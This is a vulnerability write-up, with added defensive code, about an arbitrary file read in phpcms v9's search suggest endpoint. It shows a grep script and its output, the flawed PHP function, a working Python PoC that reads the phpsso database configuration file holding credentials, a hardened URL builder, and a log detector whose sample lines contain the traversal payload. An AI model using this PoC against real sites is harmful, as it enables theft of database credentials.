phpcms v9 password disclosure


1. First there was http://www.wooyun.org/bugs/wooyun-2010-010072

   Someone reported that phpcms v9 exposes the password directly.

   At first I was puzzled: I remembered reading that the phpcms v9 admin password scheme uses a salt, so what use is dumping the password alone?

2. Later someone pointed out that it is a follow-up to the earlier http://www.wooyun.org/bugs/wooyun-2010-09463

   I remember that bug was originally reported as an XSS, but it was really a file_get_contents problem, which makes it an arbitrary file read.

3. Next came the questions of how to construct it and how to find it.

   I first used pfind (the script below) to search for file_get_contents; its output follows the script:

#!/usr/bin/env python
# pfind: recursively grep a source tree for dangerous PHP sinks and sources.
# (Python 3 port of the original Python 2 script; behaviour is unchanged.)
import os
from sys import argv


class pfind:
    # The pattern list that is active for this run. The commented-out lists
    # are the alternatives the author swapped in for other audits.
    fun = ["$_REQUEST", "$_GET", "$_POST", "$_FILE", "fput", "fread", "fwrite",
           "file_get_contents", "file_put_contents"]
    # fun=["include","include_once","require","require_once","show_source"]
    # fun=["eval","preg_replace+/e","assert","call_user_func","call_user_func_array","create_function"]
    # fun=["get_rid"]
    # fun=["select ","update","insret","$_SERVER","$_POST","$_COOKIE","$_REQUEST","$_FILES","$_ENV","$_HTTP_COOKIE_VARS","$_HTTP_ENV_VARS","$_HTTP_GET_VARS","$_HTTP_POST_FILES","$_HTTP_POST_VARS","$_HTTP_SERVER_VARS","system","exec","passthru","shell_exec","popen","proc_open","eval","assert","fwrite","fput","fread","file_put_contents","move_uploaded_file"]

    def getfl(self, fl):
        # Walk the tree; every regular file is scanned (the original did not
        # filter on .php, which is why a .js hit shows up further down).
        for i in os.listdir(fl):
            path = os.path.join(fl, i)
            if os.path.isdir(path):
                self.getfl(path)
            elif os.path.isfile(path):
                self.findfun(path)

    def findfun(self, fl):
        # Report every line that contains any of the patterns in self.fun.
        # Read-only access is all that is needed (the original opened "r+").
        with open(fl, "r", errors="replace") as fp:
            for ln, line in enumerate(fp, 1):
                for pattern in self.fun:
                    if pattern in line:
                        print("[+] File: " + fl)
                        print("[+] Line: " + str(ln))
                        print("[+] Have: " + pattern)
                        print("[+] Code: " + line)

    def vfind(self, fl, val):
        # Search a single file for one literal value.
        with open(fl, "r", errors="replace") as fp:
            for ln, line in enumerate(fp, 1):
                if val in line:
                    print("[+] File: " + fl)
                    print("[+] Have: " + val)
                    print("[+] Line: " + str(ln))
                    print("[+] Code: " + line)


if __name__ == "__main__":
    if len(argv) == 3 and argv[1] == "-p":
        pfind().getfl(argv[2])
    elif len(argv) == 4 and argv[1] == "-f":
        a = pfind()
        a.fun = [argv[3]]
        a.getfl(argv[2])
    else:
        print("[+] Code By Cond0r QQ 707447667")
        print("[+] Blog Pythoner.blog.com")
        print("[+] usage: " + argv[0] + " -p c:\\1\\")
        print("[+] usage: " + argv[0] + " -f c:\\1\\  $value")
 

pfind output:

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);

 

There are a great many file_get_contents calls; the vulnerable one is in \phpcms\modules\search\index.php at line 203, as follows:

	public function public_get_suggest_keyword() {
		#echo 'ice test';
		$url = $_GET['url'].'&q='.$_GET['q'];
		#echo $url ;
		$res = @file_get_contents($url);
		#echo $res;
		if(CHARSET != 'gbk') {
			$res = iconv('gbk', CHARSET, $res);
		}
		echo $res;
	}

You can see that url and q are concatenated directly, as url+'&q='+q, and the result goes straight into file_get_contents.
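To show what the fix looks like rather than only the bug, here is an added example (not phpcms code) that models the concatenation above in Python beside a hardened version that rebuilds the upstream URL from validated parts; the ALLOWED_HOSTS allowlist is an assumption taken from the search_suggest.js caller quoted further down, which fetches from www.google.cn.

```python
from urllib.parse import urlsplit, urlencode, parse_qs

# Upstream host the suggest proxy is meant to reach (assumption, taken from the
# search_suggest.js caller, which builds a www.google.cn/complete/search URL).
ALLOWED_HOSTS = {"www.google.cn"}


def vulnerable_build_url(url, q):
    """Mirrors $url = $_GET['url'].'&q='.$_GET['q'] in search/index.php:
    no scheme check, no host check, q is not encoded, and the result is
    whatever string the caller chose, including a local path."""
    return url + "&q=" + q


def hardened_build_url(url, q):
    """Rebuild the upstream URL from validated parts instead of trusting the
    caller's string. Raises ValueError on anything that is not an http(s)
    URL to an allowlisted host."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https, got %r" % parts.scheme)
    # Compare hostname (not netloc) so "www.google.cn@evil.example" is not
    # mistaken for the allowlisted host.
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("host %r is not allowlisted" % parts.hostname)
    if not q or len(q) > 200 or "\0" in q:
        raise ValueError("bad query term")
    query = parse_qs(parts.query)
    query["q"] = [q]  # re-encoded by urlencode, never concatenated raw
    return "%s://%s%s?%s" % (parts.scheme, parts.netloc, parts.path,
                             urlencode(query, doseq=True))
```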

 

Next I looked for somewhere this could be reached:

Using pfind again, searching for public_get_suggest_keyword, gave the following:

 

pfind output:
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {

You can tell that the second hit is where this dangerous method is called; it can be lifted out, and the url and q parameters are directly controllable. The next question was how to construct a local file path. The &q= in the middle led me astray and I could not see how to get past it; then I looked at 疯子's exe, which did solve the problem, though I am not clear why....

 

 

Finally I wrote this PoC:

#!/usr/bin/env python
# coding=utf-8

"""
This script targets the phpcms v9 configuration file; what it does is simple and crude.
Based on WooYun http://www.wooyun.org/bugs/wooyun-2010-010072
and material from 疯子's blog

Code By icefish
"""
from sys import argv
import re
import urllib.request


def run(url):
    # Reach the phpsso config file through the unvalidated url/q parameters
    # of public_get_suggest_keyword.
    url = url + '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php'
    print('\n\n***********get DataBase Password:*************\n')
    print(url)
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    info = resp.read().decode('utf-8', errors='replace')
    s = info.replace('\t', '')
    # Strip the "<?php return array(" prefix and any ">" characters for readability.
    s = re.sub(r'<\?php\s*return\s*array\s*\(', '', s)
    s = re.sub(r'>', '', s, flags=re.S)  # the original passed re.S as the count argument
    print('\n\n***********Get the Config.php****************')
    print(s)

    return info


if __name__ == '__main__':
    if len(argv) > 1:
        run(argv[1])
    else:
        print("[+] Code By icefish WeiBo http://weibo.com/u/1703624267")
        print("[+] Blog http://wcf1987.iteye.com/")
        print("[+] usage: " + argv[0] + " http://www.test.com/")
As for real-world impact: if the database does not accept remote connections, I don't think it is that dangerous.... just my opinion.
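From the defender's side, an added example (not part of the original post) that scans web-server access-log lines for requests to public_get_suggest_keyword whose url parameter is not an http(s) URL to an allowlisted host, or whose parameters carry a ".." path segment; the sample log lines are constructed, and the www.google.cn allowlist is an assumption taken from the search_suggest.js caller.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the page): one legitimate call
# from search_suggest.js, two requests shaped like the PoC, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=http%3A%2F%2Fwww.google.cn%2Fcomplete%2Fsearch%3Fhl%3Dzh-CN%26q%3Dphp&q=php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2012:10:00:07 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php HTTP/1.1" 200 1033
10.0.0.9 - - [01/Jan/2012:10:00:09 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=http%3A%2F%2Fwww.google.cn%2Fcomplete%2Fsearch&q=..%2F..%2Fcaches%2Fconfigs%2Fdatabase.php HTTP/1.1" 200 980
10.0.0.7 - - [01/Jan/2012:10:00:11 +0800] "GET /index.php?m=content&c=index&a=lists&catid=6 HTTP/1.1" 200 4410
"""

# Common/combined log format: client, timestamp, request target, status code.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Upstream host the suggest proxy legitimately fetches from (assumption).
ALLOWED_HOSTS = {"www.google.cn"}
# A ".." path segment, with either separator, anywhere in a value.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify(target):
    """Return a reason string if the request looks like abuse of
    public_get_suggest_keyword, otherwise None."""
    if "?" not in target:
        return None
    # parse_qs percent-decodes the values, so encoded "..%2F" is seen as "../".
    qs = parse_qs(target.split("?", 1)[1], keep_blank_values=True)
    if qs.get("a") != ["public_get_suggest_keyword"]:
        return None
    url = qs.get("url", [""])[0]
    q = qs.get("q", [""])[0]
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return "url is not an allowlisted http(s) URL: %r" % url
    if TRAVERSAL.search(q) or TRAVERSAL.search(url):
        return "path traversal in parameters: q=%r" % q
    return None


def scan_log(text):
    """Return (client_ip, status, target, reason) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        reason = classify(m.group(3))
        if reason:
            hits.append((m.group(1), m.group(4), m.group(3), reason))
    return hits


if __name__ == "__main__":
    for ip, status, target, reason in scan_log(SAMPLE_LOG):
        print(ip, status, reason)
```

A 200 status on a flagged request is the signal that the file read actually succeeded and the config file should be treated as exposed.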